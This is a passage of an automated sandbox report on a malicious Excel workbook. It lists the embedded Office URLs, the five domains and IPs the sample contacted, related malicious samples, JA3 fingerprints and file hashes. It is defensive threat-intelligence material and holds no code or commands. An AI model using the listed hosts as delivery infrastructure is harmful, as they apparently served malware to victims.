                                                                                                                  https://outlook.office.com/4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                                                                    high
                                                                                                                    https://storage.live.com/clientlogs/uploadlocation4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                                                                      high
                                                                                                                      https://templatelogging.office.com/client/log4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                                                                        high
                                                                                                                        https://outlook.office365.com/4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                                                                          high
                                                                                                                          https://webshell.suite.office.com4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                                                                            high
                                                                                                                            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                                                                              high
                                                                                                                              https://management.azure.com/4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                                                                                high
                                                                                                                                https://login.windows.net/common/oauth2/authorize4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                                                                                  high
                                                                                                                                  https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  https://graph.windows.net/4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                                                                                    high
                                                                                                                                    https://api.powerbi.com/beta/myorg/imports4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                                                                                      high
                                                                                                                                      https://devnull.onenote.com4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                                                                                        high
                                                                                                                                        https://ncus.pagecontentsync.4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                                                                                          high
                                                                                                                                          https://messaging.office.com/4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                                                                                            high
                                                                                                                                            https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                                                                                              high
                                                                                                                                              https://augloop.office.com/v24103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                                                                                                high
                                                                                                                                                https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://skyapi.live.net/Activity/4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://clients.config.office.net/user/v1.0/mac4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://dataservice.o365filtering.com4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://api.cortana.ai4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://onedrive.live.com4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://ovisualuiapp.azurewebsites.net/pbiagave/4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      unknown
                                                                                                                                                      https://visio.uservoice.com/forums/368202-visio-on-devices4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://directory.services.4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        unknown
                                                                                                                                                        https://login.windows-ppe.net/common/oauth2/authorize4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://staging.cortana.ai4103334B-074A-4597-8653-04BC9F5588EA.1.drfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          unknown

                                                                                                                                                          Contacted IPs

                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                          • 75% < No. of IPs

                                                                                                                                                          Public

                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                          50.116.95.68
                                                                                                                                                          springbedspetroleum.comUnited States
                                                                                                                                                          26337OIS1USfalse
                                                                                                                                                          5.100.155.169
                                                                                                                                                          ponchokhana.comUnited Kingdom
                                                                                                                                                          394695PUBLIC-DOMAIN-REGISTRYUSfalse
                                                                                                                                                          108.167.180.111
                                                                                                                                                          ethereality.infoUnited States
                                                                                                                                                          46606UNIFIEDLAYER-AS-1USfalse
                                                                                                                                                          5.100.152.162
                                                                                                                                                          thefamouscurrybazaar.co.ukUnited Kingdom
                                                                                                                                                          394695PUBLIC-DOMAIN-REGISTRYUSfalse
                                                                                                                                                          43.229.135.209
                                                                                                                                                          devrongolf.comThailand
                                                                                                                                                          56309SIAMDATA-TH408Fl4CATTOWERTHfalse

                                                                                                                                                          General Information

                                                                                                                                                          Joe Sandbox Version:31.0.0 Emerald
                                                                                                                                                          Analysis ID:383044
                                                                                                                                                          Start date:07.04.2021
                                                                                                                                                          Start time:07:46:12
                                                                                                                                                          Joe Sandbox Product:CloudBasic
                                                                                                                                                          Overall analysis duration:0h 6m 18s
                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                          Report type:light
                                                                                                                                                          Sample file name:FED8GODpaD (renamed file extension from none to xlsb)
                                                                                                                                                          Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                          Number of analysed new started processes analysed:38
                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                          Technologies:
                                                                                                                                                          • HCA enabled
                                                                                                                                                          • EGA enabled
                                                                                                                                                          • HDC enabled
                                                                                                                                                          • AMSI enabled
                                                                                                                                                          Analysis Mode:default
                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                          Detection:MAL
                                                                                                                                                          Classification:mal100.troj.expl.evad.winXLSB@11/11@5/5
                                                                                                                                                          EGA Information:Failed
                                                                                                                                                          HDC Information:Failed
                                                                                                                                                          HCA Information:
                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                          • Number of executed functions: 0
                                                                                                                                                          • Number of non-executed functions: 0
                                                                                                                                                          Cookbook Comments:
                                                                                                                                                          • Adjust boot time
                                                                                                                                                          • Enable AMSI
                                                                                                                                                          • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                          • Attach to Office via COM
                                                                                                                                                          • Scroll down
                                                                                                                                                          • Close Viewer
                                                                                                                                                          Warnings:
                                                                                                                                                          Show All
                                                                                                                                                          • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe, wuapihost.exe
                                                                                                                                                          • TCP Packets have been reduced to 100
                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 168.61.161.212, 52.255.188.83, 13.88.21.125, 52.109.76.68, 52.109.76.36, 52.109.88.40, 52.147.198.201, 13.64.90.137, 20.50.102.62, 23.54.113.104, 104.43.193.48, 23.10.249.25, 23.10.249.43, 23.0.174.200, 23.0.174.185, 20.54.26.129, 20.82.209.183, 20.82.210.154, 52.155.217.156
                                                                                                                                                          • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net

                                                                                                                                                          Simulations

                                                                                                                                                          Behavior and APIs

                                                                                                                                                          No simulations

                                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                                          IPs

                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                          50.116.95.68catalogue-41.xlsbGet hashmaliciousBrowse
                                                                                                                                                            5.100.155.169http://y.novobanco.opengateautospray.com/674616e69612e726f7361406e6f766f62616e636f2e7074Get hashmaliciousBrowse
                                                                                                                                                            • y.novobanco.opengateautospray.com/674616e69612e726f7361406e6f766f62616e636f2e7074
                                                                                                                                                            108.167.180.111catalogue-41.xlsbGet hashmaliciousBrowse
                                                                                                                                                              5.100.152.162catalogue-41.xlsbGet hashmaliciousBrowse
                                                                                                                                                                documents-602438418.xlsmGet hashmaliciousBrowse
                                                                                                                                                                  documents-602438418.xlsmGet hashmaliciousBrowse
                                                                                                                                                                    documents-575751901.xlsmGet hashmaliciousBrowse
                                                                                                                                                                      documents-1987093434.xlsmGet hashmaliciousBrowse
                                                                                                                                                                        documents-760030714.xlsmGet hashmaliciousBrowse
                                                                                                                                                                          documents-95598302.xlsmGet hashmaliciousBrowse
                                                                                                                                                                            documents-262276649.xlsmGet hashmaliciousBrowse
                                                                                                                                                                              data.xlsGet hashmaliciousBrowse
                                                                                                                                                                                full (24).xlsGet hashmaliciousBrowse
                                                                                                                                                                                  data.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    data (43).xlsGet hashmaliciousBrowse
                                                                                                                                                                                      43.229.135.209catalogue-41.xlsbGet hashmaliciousBrowse

                                                                                                                                                                                        Domains

                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                        springbedspetroleum.comcatalogue-41.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                        • 50.116.95.68
                                                                                                                                                                                        ponchokhana.comcatalogue-41.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                        • 5.100.155.169
                                                                                                                                                                                        document-1048628209.xlsGet hashmaliciousBrowse
                                                                                                                                                                                        • 5.100.155.169
                                                                                                                                                                                        document-1771131239.xlsGet hashmaliciousBrowse
                                                                                                                                                                                        • 5.100.155.169
                                                                                                                                                                                        document-1370071295.xlsGet hashmaliciousBrowse
                                                                                                                                                                                        • 5.100.155.169
                                                                                                                                                                                        document-69564892.xlsGet hashmaliciousBrowse
                                                                                                                                                                                        • 5.100.155.169
                                                                                                                                                                                        document-1320073816.xlsGet hashmaliciousBrowse
                                                                                                                                                                                        • 5.100.155.169
                                                                                                                                                                                        document-184653858.xlsGet hashmaliciousBrowse
                                                                                                                                                                                        • 5.100.155.169
                                                                                                                                                                                        document-1729033050.xlsGet hashmaliciousBrowse
                                                                                                                                                                                        • 5.100.155.169
                                                                                                                                                                                        document-1268722929.xlsGet hashmaliciousBrowse
                                                                                                                                                                                        • 5.100.155.169
                                                                                                                                                                                        document-540475316.xlsGet hashmaliciousBrowse
                                                                                                                                                                                        • 5.100.155.169
                                                                                                                                                                                        document-1456634656.xlsGet hashmaliciousBrowse
                                                                                                                                                                                        • 5.100.155.169
                                                                                                                                                                                        document-12162673.xlsGet hashmaliciousBrowse
                                                                                                                                                                                        • 5.100.155.169
                                                                                                                                                                                        document-997754822.xlsGet hashmaliciousBrowse
                                                                                                                                                                                        • 5.100.155.169
                                                                                                                                                                                        document-1376447212.xlsGet hashmaliciousBrowse
                                                                                                                                                                                        • 5.100.155.169
                                                                                                                                                                                        document-1813856412.xlsGet hashmaliciousBrowse
                                                                                                                                                                                        • 5.100.155.169
                                                                                                                                                                                        document-1776123548.xlsGet hashmaliciousBrowse
                                                                                                                                                                                        • 5.100.155.169
                                                                                                                                                                                        document-1201008736.xlsGet hashmaliciousBrowse
                                                                                                                                                                                        • 5.100.155.169
                                                                                                                                                                                        document-684762271.xlsGet hashmaliciousBrowse
                                                                                                                                                                                        • 5.100.155.169
                                                                                                                                                                                        document-1590815978.xlsGet hashmaliciousBrowse
                                                                                                                                                                                        • 5.100.155.169
                                                                                                                                                                                        document-800254041.xlsGet hashmaliciousBrowse
                                                                                                                                                                                        • 5.100.155.169
                                                                                                                                                                                        devrongolf.comcatalogue-41.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                        • 43.229.135.209
                                                                                                                                                                                        ethereality.infocatalogue-41.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                        • 108.167.180.111
                                                                                                                                                                                        thefamouscurrybazaar.co.ukcatalogue-41.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                        • 5.100.152.162

                                                                                                                                                                                        ASN

                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                        UNIFIEDLAYER-AS-1US1A8C92C-1A8C92C.xlsGet hashmaliciousBrowse
                                                                                                                                                                                        • 192.232.249.186
                                                                                                                                                                                        1A8C92C-1A8C92C.xlsGet hashmaliciousBrowse
                                                                                                                                                                                        • 192.232.249.186
                                                                                                                                                                                        SecuriteInfo.com.Trojan.Agent.FFFK.8079.xlsGet hashmaliciousBrowse
                                                                                                                                                                                        • 192.232.249.186
                                                                                                                                                                                        SecuriteInfo.com.Trojan.Agent.FFFK.23764.xlsGet hashmaliciousBrowse
                                                                                                                                                                                        • 192.232.249.186
                                                                                                                                                                                        SecuriteInfo.com.Heur.19090.xlsGet hashmaliciousBrowse
                                                                                                                                                                                        • 192.232.249.186
                                                                                                                                                                                        SALM0BRU.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 162.241.148.243
                                                                                                                                                                                        Purchase Order.8000.scan.pdf...exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 162.241.148.243
                                                                                                                                                                                        SecuriteInfo.com.Heur.4923.xlsGet hashmaliciousBrowse
                                                                                                                                                                                        • 192.232.249.186
                                                                                                                                                                                        SecuriteInfo.com.Heur.4923.xlsGet hashmaliciousBrowse
                                                                                                                                                                                        • 192.232.249.186
                                                                                                                                                                                        document-1251000362.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 192.185.48.186
                                                                                                                                                                                        document-1251000362.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 192.185.48.186
                                                                                                                                                                                        catalogue-41.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                        • 108.167.180.111
                                                                                                                                                                                        documents-1660683173.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 192.185.56.250
                                                                                                                                                                                        06iKnPFk8Y.dllGet hashmaliciousBrowse
                                                                                                                                                                                        • 162.241.54.59
                                                                                                                                                                                        06iKnPFk8Y.dllGet hashmaliciousBrowse
                                                                                                                                                                                        • 162.241.54.59
                                                                                                                                                                                        ddff.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 108.179.235.108
                                                                                                                                                                                        PowerShell_Input.ps1Get hashmaliciousBrowse
                                                                                                                                                                                        • 162.241.61.203
                                                                                                                                                                                        New PO#700-20-HDO410444RF217,pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 192.185.122.118
                                                                                                                                                                                        Purchase Order.9000.scan.pdf...exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 162.241.148.243
                                                                                                                                                                                        document-1848152474.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 192.185.48.186
                                                                                                                                                                                        OIS1UScatalogue-41.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                        • 50.116.95.68
                                                                                                                                                                                        document-4077682.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 162.241.203.140
                                                                                                                                                                                        document-1643341247.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 162.241.203.140
                                                                                                                                                                                        document-1977942244.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 162.241.203.140
                                                                                                                                                                                        document-972550903.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 162.241.203.140
                                                                                                                                                                                        document-972550903.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 162.241.203.140
                                                                                                                                                                                        document-852263110.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 162.241.203.140
                                                                                                                                                                                        document-2130763274.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 162.241.203.140
                                                                                                                                                                                        Purchase_Order 3109.xlsGet hashmaliciousBrowse
                                                                                                                                                                                        • 162.241.85.227
                                                                                                                                                                                        document-669854873.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 162.241.203.140
                                                                                                                                                                                        document-1432391719.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 162.241.203.140
                                                                                                                                                                                        document-1811269384.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 162.241.203.140
                                                                                                                                                                                        document-586537513.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 162.241.203.140
                                                                                                                                                                                        document-1080811384.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 162.241.203.140
                                                                                                                                                                                        document-1680135502.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 162.241.203.140
                                                                                                                                                                                        document-1258602967.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 162.241.203.140
                                                                                                                                                                                        document-2092739367.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 162.241.203.140
                                                                                                                                                                                        document-1113405161.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 162.241.203.140
                                                                                                                                                                                        document-423354438.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 162.241.203.140
                                                                                                                                                                                        document-1514757151.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 162.241.203.140
                                                                                                                                                                                        PUBLIC-DOMAIN-REGISTRYUSNew Order PO#121012020_____PDF_______.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 208.91.199.225
                                                                                                                                                                                        document-1251000362.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 199.79.62.99
                                                                                                                                                                                        document-1251000362.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 199.79.62.99
                                                                                                                                                                                        document-1055791644.xlsGet hashmaliciousBrowse
                                                                                                                                                                                        • 103.50.162.157
                                                                                                                                                                                        catalogue-41.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                        • 5.100.152.162
                                                                                                                                                                                        documents-1660683173.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 111.118.215.222
                                                                                                                                                                                        swift Copy.xls.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 208.91.199.225
                                                                                                                                                                                        document-1848152474.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        • 199.79.62.99
                                                                                                                                                                                        FN vw Safety 1 & 2.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 208.91.199.223
                                                                                                                                                                                        MV TBN.uslfze.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 208.91.199.224
                                                                                                                                                                                        purchase order.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 208.91.199.223
                                                                                                                                                                                        AD1-2001028L.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 208.91.199.224
                                                                                                                                                                                        AD1-2001028L (2).exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 208.91.199.224
                                                                                                                                                                                        document-1048628209.xlsGet hashmaliciousBrowse
                                                                                                                                                                                        • 5.100.155.169
                                                                                                                                                                                        document-1771131239.xlsGet hashmaliciousBrowse
                                                                                                                                                                                        • 5.100.155.169
                                                                                                                                                                                        document-1370071295.xlsGet hashmaliciousBrowse
                                                                                                                                                                                        • 5.100.155.169
                                                                                                                                                                                        document-69564892.xlsGet hashmaliciousBrowse
                                                                                                                                                                                        • 5.100.155.169
                                                                                                                                                                                        document-1320073816.xlsGet hashmaliciousBrowse
                                                                                                                                                                                        • 5.100.155.169
                                                                                                                                                                                        document-184653858.xlsGet hashmaliciousBrowse
                                                                                                                                                                                        • 5.100.155.169
                                                                                                                                                                                        document-1729033050.xlsGet hashmaliciousBrowse
                                                                                                                                                                                        • 5.100.155.169

                                                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                        37f463bf4616ecd445d4a1937da06e19JANUARY OVERDUE INVOICE.pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 50.116.95.68
                                                                                                                                                                                        • 108.167.180.111
                                                                                                                                                                                        • 5.100.155.169
                                                                                                                                                                                        • 5.100.152.162
                                                                                                                                                                                        • 43.229.135.209
                                                                                                                                                                                        elef.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 50.116.95.68
                                                                                                                                                                                        • 108.167.180.111
                                                                                                                                                                                        • 5.100.155.169
                                                                                                                                                                                        • 5.100.152.162
                                                                                                                                                                                        • 43.229.135.209
                                                                                                                                                                                        FARASIS.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                        • 50.116.95.68
                                                                                                                                                                                        • 108.167.180.111
                                                                                                                                                                                        • 5.100.155.169
                                                                                                                                                                                        • 5.100.152.162
                                                                                                                                                                                        • 43.229.135.209
                                                                                                                                                                                        dl8.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 50.116.95.68
                                                                                                                                                                                        • 108.167.180.111
                                                                                                                                                                                        • 5.100.155.169
                                                                                                                                                                                        • 5.100.152.162
                                                                                                                                                                                        • 43.229.135.209
                                                                                                                                                                                        Ordine d'acquisto 240517_04062021.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 50.116.95.68
                                                                                                                                                                                        • 108.167.180.111
                                                                                                                                                                                        • 5.100.155.169
                                                                                                                                                                                        • 5.100.152.162
                                                                                                                                                                                        • 43.229.135.209
                                                                                                                                                                                        catalogue-41.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                        • 50.116.95.68
                                                                                                                                                                                        • 108.167.180.111
                                                                                                                                                                                        • 5.100.155.169
                                                                                                                                                                                        • 5.100.152.162
                                                                                                                                                                                        • 43.229.135.209
                                                                                                                                                                                        ddff.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 50.116.95.68
                                                                                                                                                                                        • 108.167.180.111
                                                                                                                                                                                        • 5.100.155.169
                                                                                                                                                                                        • 5.100.152.162
                                                                                                                                                                                        • 43.229.135.209
                                                                                                                                                                                        Doc_58YJ54-521DERG701-55YH701.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 50.116.95.68
                                                                                                                                                                                        • 108.167.180.111
                                                                                                                                                                                        • 5.100.155.169
                                                                                                                                                                                        • 5.100.152.162
                                                                                                                                                                                        • 43.229.135.209
                                                                                                                                                                                        1e#U0414.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 50.116.95.68
                                                                                                                                                                                        • 108.167.180.111
                                                                                                                                                                                        • 5.100.155.169
                                                                                                                                                                                        • 5.100.152.162
                                                                                                                                                                                        • 43.229.135.209
                                                                                                                                                                                        svhost.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 50.116.95.68
                                                                                                                                                                                        • 108.167.180.111
                                                                                                                                                                                        • 5.100.155.169
                                                                                                                                                                                        • 5.100.152.162
                                                                                                                                                                                        • 43.229.135.209
                                                                                                                                                                                        beaconxx.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 50.116.95.68
                                                                                                                                                                                        • 108.167.180.111
                                                                                                                                                                                        • 5.100.155.169
                                                                                                                                                                                        • 5.100.152.162
                                                                                                                                                                                        • 43.229.135.209
                                                                                                                                                                                        _VmailMessage_Wave19922626.htmlGet hashmaliciousBrowse
                                                                                                                                                                                        • 50.116.95.68
                                                                                                                                                                                        • 108.167.180.111
                                                                                                                                                                                        • 5.100.155.169
                                                                                                                                                                                        • 5.100.152.162
                                                                                                                                                                                        • 43.229.135.209
                                                                                                                                                                                        5H957qLghX.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 50.116.95.68
                                                                                                                                                                                        • 108.167.180.111
                                                                                                                                                                                        • 5.100.155.169
                                                                                                                                                                                        • 5.100.152.162
                                                                                                                                                                                        • 43.229.135.209
                                                                                                                                                                                        FK58.vbsGet hashmaliciousBrowse
                                                                                                                                                                                        • 50.116.95.68
                                                                                                                                                                                        • 108.167.180.111
                                                                                                                                                                                        • 5.100.155.169
                                                                                                                                                                                        • 5.100.152.162
                                                                                                                                                                                        • 43.229.135.209
                                                                                                                                                                                        ZgaBWrz3HH.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 50.116.95.68
                                                                                                                                                                                        • 108.167.180.111
                                                                                                                                                                                        • 5.100.155.169
                                                                                                                                                                                        • 5.100.152.162
                                                                                                                                                                                        • 43.229.135.209
                                                                                                                                                                                        RFQ#8086A_461A_0000086_300_3550_2021.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 50.116.95.68
                                                                                                                                                                                        • 108.167.180.111
                                                                                                                                                                                        • 5.100.155.169
                                                                                                                                                                                        • 5.100.152.162
                                                                                                                                                                                        • 43.229.135.209
                                                                                                                                                                                        wzdu53.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 50.116.95.68
                                                                                                                                                                                        • 108.167.180.111
                                                                                                                                                                                        • 5.100.155.169
                                                                                                                                                                                        • 5.100.152.162
                                                                                                                                                                                        • 43.229.135.209
                                                                                                                                                                                        Opik_lk.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 50.116.95.68
                                                                                                                                                                                        • 108.167.180.111
                                                                                                                                                                                        • 5.100.155.169
                                                                                                                                                                                        • 5.100.152.162
                                                                                                                                                                                        • 43.229.135.209
                                                                                                                                                                                        document-895003104.xlsGet hashmaliciousBrowse
                                                                                                                                                                                        • 50.116.95.68
                                                                                                                                                                                        • 108.167.180.111
                                                                                                                                                                                        • 5.100.155.169
                                                                                                                                                                                        • 5.100.152.162
                                                                                                                                                                                        • 43.229.135.209
                                                                                                                                                                                        Dimmock5.exeGet hashmaliciousBrowse
                                                                                                                                                                                        • 50.116.95.68
                                                                                                                                                                                        • 108.167.180.111
                                                                                                                                                                                        • 5.100.155.169
                                                                                                                                                                                        • 5.100.152.162
                                                                                                                                                                                        • 43.229.135.209

                                                                                                                                                                                        Dropped Files

                                                                                                                                                                                        No context

                                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\4103334B-074A-4597-8653-04BC9F5588EA
                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                        File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):133170
                                                                                                                                                                                        Entropy (8bit):5.371015900494505
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:1536:xcQIeNquBXA3gBwqpQ9DQW+zAM34ZldpKWXboOilXNErLdME9:hVQ9DQW+zTXiJ
                                                                                                                                                                                        MD5:A3659928CCC9644BB279FD06C19D9616
                                                                                                                                                                                        SHA1:2EDC455FD68268D9834767EF969A60F9ED75208A
                                                                                                                                                                                        SHA-256:E3FB5B23995F01BB5A83FB44B9DC115B474E7F14ABEF4004334368F90C2C74D7
                                                                                                                                                                                        SHA-512:54E6D98FB0DD69EAC164EE4CA9052241C1C61F7F553124FC78F1D460188D24412309B6EE21A76ED704FEFC01BFBB59A8C12684BCF20AE1AF3E7C0CE032AD4873
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Reputation:low
